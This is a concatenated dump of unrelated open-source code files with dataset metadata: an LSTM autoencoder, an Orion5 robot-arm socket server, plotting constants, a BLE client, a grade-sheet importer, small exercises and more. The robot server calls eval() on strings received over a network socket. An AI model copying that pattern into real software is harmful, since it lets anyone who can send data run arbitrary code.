ay_final,\n \"visible\": visible,\n }\n )\n\n return traces\n\n\ndef build_filter_trial(keep_trial_indices: List[int]) -> Callable[[Observation], bool]:\n \"\"\"Creates a callable that filters observations based on trial_index\"\"\"\n\n def trial_filter(obs: Observation) -> bool:\n return obs.features.trial_index in keep_trial_indices\n\n return trial_filter\n\n\ndef compose_annotation(\n caption: str, x: float = 0.0, y: float = -0.15\n) -> List[Dict[str, Any]]:\n if not caption:\n return []\n return [\n {\n \"showarrow\": False,\n \"text\": caption,\n \"x\": x,\n \"xanchor\": \"left\",\n \"xref\": \"paper\",\n \"y\": y,\n \"yanchor\": \"top\",\n \"yref\": \"paper\",\n \"align\": \"left\",\n },\n ]\n","repo_name":"facebook/Ax","sub_path":"ax/plot/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":33175,"program_lang":"python","lang":"en","doc_type":"code","stars":2182,"dataset":"github-code","pt":"77"} +{"seq_id":"36899334596","text":"import json\nimport os\nimport sys\nfrom typing import Optional\n\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import Subset, DataLoader\nfrom transformers import BertTokenizerFast\n\nDEVICE = torch.device(\"cuda\") if torch.cuda.is_available() else torch.device(\"cpu\")\n\n# Use BERT's vocabulary as a slight simplification\nLSTMAutoencoderSubwordTokenizer = BertTokenizerFast\n\n\nclass LSTMAutoencoder(nn.Module):\n def __init__(self, vocab_size, embedding_dim, hidden_size, max_length, dropout=0.0, bidirectional=False,\n padding_idx=0):\n super().__init__()\n self.vocab_size = vocab_size\n self.embedding_dim = embedding_dim\n self.hidden_size = hidden_size\n self.dropout = dropout\n self.bidirectional = bidirectional\n self.padding_idx = padding_idx\n self.max_length = max_length\n\n self.num_directions = 2 if bidirectional else 1\n\n self.embedder = nn.Embedding(num_embeddings=self.vocab_size, embedding_dim=self.embedding_dim,\n padding_idx=self.padding_idx)\n self.lstm = nn.LSTM(input_size=self.embedding_dim, hidden_size=self.hidden_size,\n bidirectional=self.bidirectional, batch_first=True)\n self.decoders = nn.ModuleList([nn.Linear(in_features=self.num_directions*self.hidden_size,\n out_features=self.vocab_size) for _ in range(self.max_length)])\n\n @staticmethod\n def from_pretrained(model_dir):\n with open(os.path.join(model_dir, \"lstmae_config.json\"), \"r\", encoding=\"utf-8\") 
as f:\n config = json.load(f)\n\n instance = LSTMAutoencoder(**config)\n instance.load_state_dict(torch.load(os.path.join(model_dir, \"lstmae.th\"), map_location=DEVICE))\n return instance\n\n def save_pretrained(self, model_dir):\n if not os.path.exists(model_dir):\n os.makedirs(model_dir)\n\n with open(os.path.join(model_dir, \"lstmae_config.json\"), \"w\", encoding=\"utf-8\") as f:\n json.dump({\n \"vocab_size\": self.vocab_size,\n \"embedding_dim\": self.embedding_dim,\n \"hidden_size\": self.hidden_size,\n \"max_length\": self.max_length,\n \"dropout\": self.dropout,\n \"bidirectional\": self.bidirectional,\n \"padding_idx\": self.padding_idx\n }, fp=f, indent=4)\n\n torch.save(self.state_dict(), os.path.join(model_dir, \"lstmae.th\"))\n\n def forward(self, input_ids: torch.Tensor,\n attention_mask: Optional[torch.Tensor] = None,\n labels: Optional[torch.Tensor] = None):\n batch_size, max_len = input_ids.shape\n _batch_indexer = torch.arange(batch_size)\n\n eff_attention_mask = torch.ones_like(input_ids, dtype=torch.bool) if attention_mask is None else attention_mask\n input_len = torch.sum(eff_attention_mask, dim=1)\n\n embedded_input = torch.dropout(self.embedder(input_ids),\n p=self.dropout,\n train=self.training) # [batch_size, max_length, embedding_size]\n features, _ = self.lstm(embedded_input) # [batch_size, max_length, 2 * hidden_size]\n decomposed_features = features.view(batch_size, max_len, self.num_directions, self.hidden_size)\n\n latent_repr = decomposed_features[_batch_indexer, input_len - 1, 0] # [batch_size, hidden_size]\n if self.num_directions == 2:\n latent_repr = torch.cat((latent_repr, decomposed_features[:, 0, 1]), dim=1) # [batch_size, 2 * hidden_size]\n\n latent_repr = torch.dropout(latent_repr,\n p=self.dropout,\n train=self.training)\n\n logits = []\n for idx_feature in range(self.max_length):\n curr_logits = self.decoders[idx_feature](latent_repr)\n logits.append(curr_logits)\n\n logits = torch.stack(logits, dim=1) # [batch_size, max_length, vocab_size]\n\n ret = {\"logits\": logits}\n if labels is not None:\n criterion = nn.CrossEntropyLoss(ignore_index=self.padding_idx)\n loss = criterion(logits.view(-1, self.vocab_size), labels.view(-1))\n ret[\"loss\"] = loss\n\n return ret\n\n\nif __name__ == \"__main__\":\n from explain_nlp.experimental.data import load_nli, TransformerSeqPairDataset, LABEL_TO_IDX\n import torch.optim as optim\n import logging\n from argparse import ArgumentParser\n\n parser = ArgumentParser()\n parser.add_argument(\"--training_path\", type=str, required=True)\n parser.add_argument(\"--validation_path\", type=str, required=True)\n parser.add_argument(\"--save_dir\", type=str, default=\"lstm_ae_lm\")\n\n parser.add_argument(\"--embedding_size\", type=int, default=300)\n parser.add_argument(\"--hidden_size\", type=int, default=256)\n parser.add_argument(\"--dropout\", type=float, default=0.0)\n parser.add_argument(\"--bidirectional\", action=\"store_true\")\n parser.add_argument(\"--learning_rate\", type=float, default=0.001)\n parser.add_argument(\"--bert_tokenizer_handle\", type=str, default=\"bert-base-uncased\",\n help=\"Handle of BERT tokenizer whose vocabulary is used in the modeling process\")\n\n parser.add_argument(\"--batch_size\", type=int, default=32)\n parser.add_argument(\"--max_length\", type=int, default=41)\n\n parser.add_argument(\"--num_epochs\", type=int, default=100)\n parser.add_argument(\"--validate_every_n_steps\", type=int, default=5000)\n parser.add_argument(\"--early_stopping_rounds\", type=int, default=5)\n\n 
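# (editor's sketch, not part of the original script) Once the training loop\n    # below has saved a checkpoint, reconstruction could look roughly like\n    # this, with \"model_dir\" standing in for the save directory:\n    #\n    #     tok = LSTMAutoencoderSubwordTokenizer.from_pretrained(model_dir)\n    #     ae = LSTMAutoencoder.from_pretrained(model_dir).to(DEVICE).eval()\n    #     enc = tok([\"a man is sleeping\"], padding=\"max_length\",\n    #               max_length=ae.max_length, return_tensors=\"pt\")\n    #     with torch.no_grad():\n    #         ids = ae(enc[\"input_ids\"].to(DEVICE))[\"logits\"].argmax(dim=-1)\n    #     print(tok.batch_decode(ids, skip_special_tokens=True))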
args = parser.parse_args()\n logger = logging.getLogger()\n logger.setLevel(logging.INFO)\n logger.addHandler(logging.StreamHandler(sys.stdout))\n\n tokenizer = LSTMAutoencoderSubwordTokenizer.from_pretrained(args.bert_tokenizer_handle)\n tokenizer.save_pretrained(args.save_dir)\n\n df_train = load_nli(args.training_path)\n df_dev = load_nli(args.validation_path)\n\n train_dataset = TransformerSeqPairDataset.build(first=df_train[\"sentence1\"].values,\n second=df_train[\"sentence2\"].values,\n labels=df_train[\"gold_label\"].apply(\n lambda label_str: LABEL_TO_IDX[\"snli\"][label_str]\n ).values,\n tokenizer=tokenizer, max_seq_len=args.max_length)\n\n dev_dataset = TransformerSeqPairDataset.build(first=df_dev[\"sentence1\"].values,\n second=df_dev[\"sentence2\"].values,\n labels=df_dev[\"gold_label\"].apply(\n lambda label_str: LABEL_TO_IDX[\"snli\"][label_str]\n ).values,\n tokenizer=tokenizer, max_seq_len=args.max_length)\n\n model = LSTMAutoencoder(vocab_size=len(tokenizer),\n embedding_dim=args.embedding_size,\n hidden_size=args.hidden_size,\n max_length=args.max_length,\n dropout=args.dropout,\n bidirectional=args.bidirectional,\n padding_idx=tokenizer.pad_token_id).to(DEVICE)\n optimizer = optim.Adam(params=model.parameters(), lr=args.learning_rate)\n\n with open(os.path.join(args.save_dir, \"training_settings.json\"), \"w\", encoding=\"utf-8\") as f:\n json.dump(vars(args), fp=f, indent=4)\n\n num_train_subsets = (len(train_dataset) + args.validate_every_n_steps - 1) // args.validate_every_n_steps\n best_dev_loss, no_increase = float(\"inf\"), 0\n for idx_epoch in range(args.num_epochs):\n logging.info(f\"*Epoch #{idx_epoch}*\")\n training_loss, train_denom = 0.0, 0\n\n rand_indices = torch.randperm(len(train_dataset))\n for idx_subset in range(num_train_subsets):\n logging.info(f\"Running subset #{idx_subset}\")\n s_sub, e_sub = idx_subset * args.validate_every_n_steps, (idx_subset + 1) * args.validate_every_n_steps\n\n model.train()\n for curr_batch in DataLoader(Subset(train_dataset, rand_indices[s_sub: e_sub]),\n batch_size=args.batch_size):\n res = model(input_ids=curr_batch[\"input_ids\"].to(DEVICE),\n labels=curr_batch[\"input_ids\"].to(DEVICE))\n\n curr_loss = res[\"loss\"]\n training_loss += float(curr_loss)\n train_denom += 1\n\n curr_loss.backward()\n optimizer.step()\n optimizer.zero_grad()\n\n logging.info(f\"Training loss: {training_loss / train_denom: .4f}\")\n\n dev_loss, dev_denom = 0.0, 0\n model.eval()\n with torch.no_grad():\n for curr_dev_batch in DataLoader(dev_dataset, batch_size=2*args.batch_size):\n res = model(input_ids=curr_dev_batch[\"input_ids\"].to(DEVICE),\n labels=curr_dev_batch[\"input_ids\"].to(DEVICE))\n dev_loss += float(res[\"loss\"])\n dev_denom += 1\n\n dev_loss /= dev_denom\n logging.info(f\"Dev loss: {dev_loss: .4f}\")\n if dev_loss < best_dev_loss:\n best_dev_loss = dev_loss\n no_increase = 0\n\n logging.info(\"Saving new best model!\")\n model.save_pretrained(args.save_dir)\n else:\n no_increase += 1\n\n if no_increase == args.early_stopping_rounds:\n logging.info(f\"Stopping early... 
Best dev loss: {best_dev_loss: .4f}\")\n exit(0)\n\n","repo_name":"matejklemen/pete","sub_path":"explain_nlp/custom_modules/autoencoder.py","file_name":"autoencoder.py","file_ext":"py","file_size_in_byte":9921,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"77"} +{"seq_id":"12292503046","text":"import time\nimport socket\nimport select\nimport Orion5\nfrom General import ComQuery\n\ndef tryConversion(data):\n try:\n if '.' in data[3]:\n value = float(data[3])\n else:\n value = int(data[3])\n except ValueError:\n print(data)\n print(\"Orion5_Server: ValueError in conversion 1\")\n return None\n return value\n\ncomport = None\nprint('\\nSearching for Orion5...')\ntry:\n while True:\n comport = ComQuery()\n if comport is not None:\n print('Found Orion5, serial port name:', comport.device)\n break\n time.sleep(2)\nexcept KeyboardInterrupt:\n print('\\nExiting...\\n')\n quit()\n\nHOST = 'localhost'\nPORT = 42000\n\nrunning = True\nmax_timeouts = 5\ntimeouts = 0\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.bind((HOST, PORT))\ns.listen(1)\n\norion = Orion5.Orion5(comport.device)\n\nprint('\\nIf MATLAB code crashes, call the orion.stop() function in MATLAB console.')\n\nwhile running:\n print('\\nWaiting for MATLAB')\n\n s.settimeout(None)\n conn, addr = s.accept()\n s.settimeout(0)\n\n connected = True\n print('Connected to MATLAB')\n\n try:\n while connected:\n data = ''\n\n ready = select.select([conn], [], [], 1)\n\n if ready[0]:\n data = conn.recv(1024).decode()\n \n if not data or len(data) == 0 or not ready[0]:\n timeouts += 1\n if timeouts > max_timeouts:\n connected = False\n print('Timeout')\n else:\n timeouts = 0\n\n if data == 'p':\n conn.sendall('p'.encode())\n elif data == 'q':\n break\n else:\n try:\n data = data.split('+')\n data_dict = {\n 'jointID': int(data[0]),\n 'id1': data[1],\n 'id2': data[2]\n }\n except ValueError:\n print(data)\n print(\"Orion5_Server: ValueError in conversion 2\")\n continue\n \n if data_dict['id1'] == 'posFeedback':\n conn.sendall(str(orion.getJointAngles()).encode())\n elif data_dict['id1'] == 'velFeedback':\n conn.sendall(str(orion.getJointSpeeds()).encode())\n elif data_dict['id1'] == 'torFeedback':\n conn.sendall(str(orion.getJointLoads()).encode())\n elif data_dict['id1'] == 'posControl':\n conn.sendall('r'.encode())\n orion.setJointAnglesArray(eval(data[3]))\n elif data_dict['id1'] == 'velControl':\n conn.sendall('r'.encode())\n orion.setJointSpeedsArray(eval(data[3]))\n elif data_dict['id1'] == 'enControl':\n conn.sendall('r'.encode())\n orion.setJointTorqueEnablesArray(eval(data[3]))\n elif data_dict['id1'] == 'config':\n conn.sendall('r'.encode())\n value = tryConversion(data)\n if value == None:\n continue\n orion.setVariable(data_dict['id2'], value)\n elif len(data) == 4:\n conn.sendall('r'.encode())\n value = tryConversion(data)\n if value == None:\n continue\n orion.joints[data_dict['jointID']].setVariable(data_dict['id1'], data_dict['id2'], value)\n elif len(data) == 3:\n var = orion.joints[data_dict['jointID']].getVariable(data_dict['id1'], data_dict['id2'])\n conn.sendall(str(var).encode())\n except KeyboardInterrupt:\n running = False\n print('\\nExiting...\\n')\n finally:\n conn.close()\n if running:\n print('Disconnected from 
MATLAB')\n\ns.close()\norion.exit()\n","repo_name":"csmithcripps/orion5_ros","sub_path":"Orion5-master/Libraries/Orion5_Server.py","file_name":"Orion5_Server.py","file_ext":"py","file_size_in_byte":4231,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"72419699769","text":"# -*- coding: utf-8 -*-\nimport matplotlib as mpl\nimport numpy as np\nimport utool as ut\n\n# (print, print_, printDBG, rrr, profile) = utool.inject(__name__, '[custom_constants]', DEBUG=False)\nut.noinject(__name__, '[custom_constants]')\n# GENERAL FONTS\n\nSMALLEST = 6\nSMALLER = 8\nSMALL = 10\nMED = 12\nLARGE = 14\nLARGER = 18\n# fpargs = dict(family=None, style=None, variant=None, stretch=None, fname=None)\n\n\ndef FontProp(*args, **kwargs):\n r\"\"\"overwrite fontproperties with custom settings\n\n Kwargs:\n fname=u'',\n name=u'',\n style=u'normal',\n variant=u'normal',\n weight=u'normal',\n stretch=u'normal',\n size=u'medium'\n \"\"\"\n kwargs['family'] = 'monospace'\n font_prop = mpl.font_manager.FontProperties(*args, **kwargs)\n return font_prop\n\n\nFONTS = ut.DynStruct()\nFONTS.smallest = FontProp(weight='light', size=SMALLEST)\nFONTS.small = FontProp(weight='light', size=SMALL)\nFONTS.smaller = FontProp(weight='light', size=SMALLER)\nFONTS.med = FontProp(weight='light', size=MED)\nFONTS.large = FontProp(weight='light', size=LARGE)\nFONTS.medbold = FontProp(weight='bold', size=MED)\nFONTS.largebold = FontProp(weight='bold', size=LARGE)\n\n# SPECIFIC FONTS\n\nif False:\n # personal\n FONTS.legend = FONTS.small\n FONTS.figtitle = FONTS.med\n FONTS.axtitle = FONTS.small\n FONTS.subtitle = FONTS.med\n # FONTS.xlabel = FONTS.smaller\n FONTS.xlabel = FONTS.small\n FONTS.ylabel = FONTS.small\n FONTS.relative = FONTS.smallest\nelse:\n # personal\n FONTS.legend = FONTS.med\n FONTS.figtitle = FONTS.large\n FONTS.axtitle = FONTS.med\n FONTS.subtitle = FONTS.med\n # FONTS.xlabel = FONTS.smaller\n FONTS.xlabel = FONTS.med\n FONTS.ylabel = FONTS.med\n FONTS.relative = FONTS.med\n\n# COLORS\n\nRED = np.array((255, 0, 0, 255)) / 255.0\nYELLOW = np.array((255, 255, 0, 255)) / 255.0\nGREEN = np.array((0, 255, 0, 255)) / 255.0\nCYAN = np.array((0, 255, 255, 255)) / 255.0\nBLUE = np.array((0, 0, 255, 255)) / 255.0\nMAGENTA = np.array((255, 0, 255, 255)) / 255.0\n\nORANGE = np.array((255, 127, 0, 255)) / 255.0\nBLACK = np.array((0, 0, 0, 255)) / 255.0\nWHITE = np.array((255, 255, 255, 255)) / 255.0\nGRAY = np.array((127, 127, 127, 255)) / 255.0\nLIGHTGRAY = np.array((220, 220, 220, 255)) / 255.0\nDEEP_PINK = np.array((255, 20, 147, 255)) / 255.0\nPINK = np.array((255, 100, 100, 255)) / 255.0\nLIGHT_PINK = np.array((255, 200, 200, 255)) / 255.0\nFALSE_RED = np.array((255, 51, 0, 255)) / 255.0\nTRUE_GREEN = np.array((0, 255, 0, 255)) / 255.0\n# TRUE_BLUE = np.array(( 0, 255, 255, 255)) / 255.0\nTRUE_BLUE = np.array((0, 115, 207, 255)) / 255.0\nDARK_GREEN = np.array((0, 127, 0, 255)) / 255.0\nDARK_BLUE = np.array((0, 0, 127, 255)) / 255.0\nDARK_RED = np.array((127, 0, 0, 255)) / 255.0\nDARK_ORANGE = np.array((127, 63, 0, 255)) / 255.0\nDARK_YELLOW = np.array((127, 127, 0, 255)) / 255.0\nPURPLE = np.array((102, 0, 153, 255)) / 255.0\nBRIGHT_PURPLE = np.array((255, 0, 255, 255)) / 255.0\nLIGHT_PURPLE = np.array((255, 102, 255, 255)) / 255.0\nBRIGHT_GREEN = np.array((39, 255, 20, 255)) / 255.0\nPURPLE2 = np.array((150, 51, 200, 255)) / 255.0\nLIGHT_BLUE = np.array((102, 100, 255, 255)) / 255.0\nLIGHT_GREEN = np.array((102, 255, 102, 255)) / 255.0\nNEUTRAL = np.array((225, 229, 
231, 255)) / 255.0\nNEUTRAL_BLUE = np.array((159, 159, 241, 255)) / 255.0\nUNKNOWN_PURP = PURPLE\n\n\n# GOLDEN RATIOS\nPHI_numer = 1 + np.sqrt(5)\nPHI_denom = 2.0\nPHI = PHI_numer / PHI_denom\n\n\ndef golden_wh2(sz):\n return (PHI * sz, sz)\n\n\ndef golden_wh(x):\n 'returns a width / height with a golden aspect ratio'\n return list(map(int, list(map(round, (x * 0.618, x * 0.312)))))\n\n\n# FIGURE GEOMETRY\nDPI = 96\n# FIGSIZE = (24) # default windows fullscreen\nFIGSIZE_MED = (12, 6)\nFIGSIZE_SQUARE = (12, 12)\nFIGSIZE_GOLD = golden_wh2(8)\nFIGSIZE_BIGGER = (24, 12)\nFIGSIZE_HUGE = (32, 16)\n\n# FIGSIZE = FIGSIZE_MED\n# Quality drawings\nFIGSIZE = FIGSIZE_GOLD\n","repo_name":"WildMeOrg/wildbook-ia","sub_path":"wbia/plottool/custom_constants.py","file_name":"custom_constants.py","file_ext":"py","file_size_in_byte":3891,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"77"} +{"seq_id":"25848230804","text":"# Caesar Cipher is crypting a message by shifting the letters\n\ndef cCipher(str1, shift = 2):\n if (type(str1) == str):\n \n str3 = [] \n for i in range(0,len(str1)):\n\n str3.append(ord(str1[i]) + shift)\n \n mystr = '' # starting an empty string\n\n for i in str3:\n mystr = mystr + chr(i) # converting the ascii numbers into characters and concatinating them\n return mystr\n else:\n print('the input is not a string')\n return 0\n\n\nprint(cCipher('i love you', 3))\n\n","repo_name":"ovravindra/RavindraML","sub_path":"cCipher.py","file_name":"cCipher.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"35298335368","text":"import asyncio\nfrom bleak import BleakScanner, BleakClient\n\nreceived = asyncio.Event()\n\n\ndef notify_callback(sender: int, data: bytearray):\n global received\n print(\"received: {}: {}\".format(sender, data))\n received.set()\n\n\nasync def run():\n devices = await BleakScanner.discover()\n for d in devices:\n if d.name == 'SldrOne':\n async with BleakClient(d.address) as client:\n print('Connecting to: {}'.format(d))\n print('connected: {}'.format(await client.connect()))\n IO_CTRL_CHARACTERISTIC_UUID = \"7da5b2e6-071c-4601-9fde-ecaf291d0a04\"\n IO_CTRL_READ_CHARACTERISTIC_UUID = \"eaa8212a-3551-4e98-adeb-0b68957a215a\"\n READ_CHARACTERISTIC_UUID = \"c2720639-bdfc-4b8e-896d-b5bea0479976\"\n WRITE_CHARACTERISTIC_UUID = \"5a861ccb-687b-459a-af01-347792f07a0c\"\n print('registering callback on READ_CHARACTERISTIC_UUID')\n asyncio.ensure_future(client.start_notify(READ_CHARACTERISTIC_UUID, notify_callback))\n print('registering callback on IO_CTRL_READ_CHARACTERISTIC_UUID')\n asyncio.ensure_future(client.start_notify(IO_CTRL_READ_CHARACTERISTIC_UUID, notify_callback))\n print('getting services')\n services = await client.get_services()\n print('writing')\n await client.write_gatt_char(IO_CTRL_CHARACTERISTIC_UUID, bytes(b'\\x04\\x09\\x0c\\xb0\\x00\\xc9')) #BT_ATT_OP_WRITE_REQ\n print('wrote')\n await asyncio.sleep(60)\n await client.disconnect()\n\nloop = asyncio.get_event_loop()\nloop.run_until_complete(run())","repo_name":"Brenden-Morales/slider-re","sub_path":"slide.py","file_name":"slide.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"43787351290","text":"#!/usr/bin/env python3\ndef write_txt():\n\timport sys\n\t\n\tRNA = sys.argv[1]\n\teach_line_100 = len(RNA)//100\n\n\tname = input(\"Write the name of species : 
\")\n\n\tnewfile = open(\"./Gene.txt\", 'w')\n\t\n\tnewfile.write(\">%s\\n\" %name)\n\n\tletter = -1\n\tfor i in range(each_line_100):\n\t\tfor j in range(100):\n\t\t\tletter += 1\n\t\t\tnewfile.write(RNA[letter])\n\t\tnewfile.write(\"\\n\")\n\t\n\tif len(RNA)%100 != 0:\n\t\tfor m in range(len(RNA)%100):\n\t\t\tletter += 1\n\t\t\tnewfile.write(RNA[letter])\n\t\n\tnewfile.close()\n\nif __name__ == '__main__':\n\twrite_txt()\n","repo_name":"Polaroidd/PRIMER_2022_1","sub_path":"write_gene_txt.py","file_name":"write_gene_txt.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"21458890617","text":"lines = []\nbounds = (0, 0)\n\nwith open('input.txt') as f:\n for line in f:\n a, b = line.rstrip().split(' -> ')\n x1, y1 = [int(n) for n in a.split(',')]\n x2, y2 = [int(n) for n in b.split(',')]\n\n if not (x1 == x2 or y1 == y2):\n # diagonal\n continue\n\n lines.append(((min(x1, x2), min(y1, y2), max(x1, x2), max(y1, y2))))\n bounds = (\n max(bounds[0], x1, x2),\n max(bounds[1], y1, y2)\n )\n\nprint(f'Bounds: {bounds}')\nprint(f'Lines: {len(lines)}')\n\ncounts = [[0] * (bounds[0] + 1) for i in range(bounds[1] + 1)]\n\nfor x1, y1, x2, y2 in lines:\n if x1 == x2:\n for i in range(y1, y2 + 1):\n counts[i][x1] += 1\n\n elif y1 == y2:\n for i in range(x1, x2 + 1):\n counts[y1][i] += 1\n\ncount = 0\nfor l in counts:\n for v in l:\n if v > 1:\n count += 1\n\nprint(count)","repo_name":"tiagoad/aoc21","sub_path":"5/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"16290265484","text":"import openpyxl\nimport datetime\nimport base64\nimport json\nfrom django.conf import settings\n\nfrom Cryptodome.Cipher import AES\nfrom . encryptdecrypt import encrypt , decrypt\nfrom . ScoreSheetClass import ScoreSheetClass\nfrom . 
basicunit import basicunit \nimport ast\n\ndef returnreporttypes():\n \n\n return Reports\n\n\ndef validatelist(Scoreslist):\n err =1\n msg = \"\"\n for score in Scoreslist:\n if score.myScore == -1 :\n err = -1\n msg = \"Could Not Process Upload,\"+ score.myStudentId +\" Has Entries with No Score\"\n return(err,msg)\n return(err,msg)\n\ndef generatescorelist(excel_file):\n wb = openpyxl.Workbook() \n wb = openpyxl.load_workbook(excel_file)\n ws = wb[\"SCORESSHEET\"]\n ws.protection.sheet = True\n row_start=7\n try :\n print(\"insisde generatescorelist\")\n SECRETKEYciphertext =ws.cell(1, 1).value\n print(SECRETKEYciphertext)\n #newvalue = SECRETKEYciphertext#.decode(\"utf-8\");\n #print(\"ECRETKEYciphertext\")\n #print(SECRETKEYciphertext)\n #python_dict = json.loads(SECRETKEYciphertext);\n #print(python_dict)\n #print(\"afterECRETKEYciphertext\")\n #print(type(SECRETKEYciphertext))\n #Convert String To Dictionary\n dict_string=SECRETKEYciphertext\n converted_dict = ast.literal_eval(dict_string)\n #print('Data type of variable converted_dict is ', type(converted_dict))\n #Access value from dictionary\n #print(converted_dict[\"salt\"])\n #cipher = AES.new(settings.CIPHER_PASS.rjust(32, 'X'),AES.MODE_ECB) # never use ECB in strong systems obviously\n #decodedSecretkey = decrypt(base64.b64decode(SECRETKEYciphertext)).decode(\"utf-8\") \n #decodedSecretkey = decrypt(SECRETKEYciphertext,settings.CIPHER_PASS) \n decodedSecretkey = decrypt(converted_dict,settings.CIPHER_PASS)\n print(decodedSecretkey)\n print(\"Finished decrypting\")\n newvalue = decodedSecretkey.decode(\"utf-8\");\n #print(newvalue)\n #print(type(newvalue))\n #print(\"Finished decrypting and removed b\")\n #python_dict = json.loads(newvalue);\n #print(type(python_dict))\n #print(python_dict)\n #print(\"Finished decrypting and removed b print(type(python_dict))\")\n #xindex=decodedSecretkey.find('{\"CCODE\":') \n #print(\"The index is\")\n #print(xindex)\n #print(\"The index is after\")\n #decodedSecretkey= decodedSecretkey[xindex :]\n #Secretkeyobj=json.loads(decodedSecretkey)\n Secretkeyobj=json.loads(newvalue)\n \n except Exception as inst:\n print(\"I am raise error\")\n print(inst) \n return {},{}\n \n \n\n\n\n myCampId=Secretkeyobj['CID']\n print(myCampId)\n myFacId=\"XXX\"\n myDeptId=\"XXX\"\n myProgId=\"XXX\"\n myProgOptionId=\"XXX\"\n myAsetId = Secretkeyobj['AsetId']\n myAsessionId = Secretkeyobj['AsessionId']\n mySemesterId = Secretkeyobj['SemesterId']\n myLevelTodo = Secretkeyobj['LevelToDo']\n myCourseId = Secretkeyobj['CourseId']\n myCourseUnit = Secretkeyobj['CourseUnit']\n\n print(myCourseId)\n print(\"myCourseId\")\n basicunits = basicunit( myCampId,myFacId,myDeptId,myProgId,myProgOptionId,myAsetId,myAsessionId,mySemesterId,myLevelTodo,myCourseId)\n \n total =int(Secretkeyobj['TOTAL'])\n scorelist = [] \n for i in range(row_start,total+ row_start):\n CourseId =ws.cell(i, 8).value\n myScoreSheetClassId = ws.cell(i, 9).value\n \n StudentId = ws.cell(i, 2).value\n AsessionId =Secretkeyobj['AsessionId']\n SemesterId =Secretkeyobj['SemesterId']\n \n AsetId =Secretkeyobj['AsetId']\n LevelToDo=Secretkeyobj['LevelToDo']\n CourseState=ws.cell(i, 10).value\n CourseUnit = Secretkeyobj['CourseUnit']\n CourseNature= ws.cell(i, 11).value\n Score=ws.cell(i, 6).value \n AUserId =1\n donedate= str(datetime.datetime.today())\n ReadOnly=ws.cell(i, 13).value\n \n # d1 = ScoreSheetClass(DetailResultId , StudentId , AsessionId, SemesterId, CourseId, AsetId, LevelToDo, CourseState, CourseUnit, \n # CourseNature, Score, AUserId, 
donedate, ReadOnly ) \n # scorelist.append(d1) \n\n d1 = ScoreSheetClass ( myScoreSheetClassId, \"\", \"\", \"\", StudentId, AsessionId, SemesterId, CourseId, AsetId, LevelToDo, CourseUnit, CourseNature, CourseState, Score, \n AUserId, donedate, ReadOnly, ws.cell(i, 12).value, Secretkeyobj['CID'] ) \n scorelist.append(d1) \n \n return scorelist,basicunits","repo_name":"Oladeji/LecturerToWebResultDjangoInteface","sub_path":"GradeManagerapp/generatescorelist.py","file_name":"generatescorelist.py","file_ext":"py","file_size_in_byte":5719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9432608134","text":"from json import JSONEncoder, JSONDecoder\nfrom libs.logger.logger import log\n\nclass Response():\n def __init__(self, request):\n log('libs/http/Response', request)\n self.request = request\n self.status = '200'\n self.headers = []\n self.json = {\n 'status': 'ok',\n 'message': '',\n 'data': {},\n }\n\n def setJSON(self, json = {}):\n log('libs/http/Response/setJSON', json)\n self.status = '200'\n self.json = {\n 'status': 'ok',\n 'message': '',\n 'data': json,\n }\n return self\n\n def setError(self, status = '400', message = ''):\n log('libs/http/Response/setError', {status, message})\n self.status = status\n self.json = {\n 'status': 'error',\n 'message': message,\n 'data': {},\n }\n return self\n \n def getStatusMessage(self, status):\n log('libs/http/Response/getStatusMessage', status)\n if status == '200':\n return 'OK'\n\n if status == '404':\n return 'NOT FOUND'\n\n return 'ERROR'\n \n def getFirstLine(self, status):\n log('libs/http/Response/getFirstLine', status)\n message = self.getStatusMessage(status)\n return ' '.join(['HTTP/1.1', status, message])\n\n def getBodyString(self):\n log('libs/http/Response/getBodyString', self.json)\n return str(self.json)\n\n def __str__(self):\n res = []\n\n res.append(self.getFirstLine(self.status))\n res.append(': '.join(['Content-Type', 'application/json']))\n res.append('')\n res.append(self.getBodyString())\n\n res.append('')\n\n return str('\\r\\n'.join(res))\n","repo_name":"brtmvdl/hidden","sub_path":"src/api/libs/http/Response.py","file_name":"Response.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"34060090753","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Feb 25 20:02:16 2019\n\n@author: Will\n\"\"\"\n\nprint(\"Please think of a number between 0 and 100\")\nlow=0\nhigh=100\nwhile True:\n ans=int((low+high)/2)\n print(\"Is your secret number\",ans,\"?\")\n print(\"Enter 'h' to indicate the guess is too high.\")\n print(\"Enter 'l' to indicate the guess is too low.\")\n print(\"Enter 'c' to indicate I guessed correctly.\")\n guess=input()\n if guess==\"c\":\n break\n elif guess==\"h\":\n high=ans\n elif guess==\"l\":\n low=ans\n else:\n print(\"Wrong Input\")\nprint(\"Game Over\")\nprint(\"Your secret number was:\",ans)","repo_name":"cuichacha/MIT-6.00.1x","sub_path":"Week 2: Simple Programs/3. 
